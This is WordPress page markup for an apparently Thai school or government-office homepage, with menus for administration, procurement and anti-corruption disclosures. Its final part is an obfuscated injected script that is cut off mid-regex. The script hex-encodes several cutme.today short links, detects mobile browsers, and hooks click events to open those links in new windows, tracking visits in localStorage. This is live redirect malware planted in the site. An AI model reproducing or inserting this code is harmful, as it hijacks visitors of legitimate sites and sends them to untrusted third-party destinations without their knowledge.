{\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 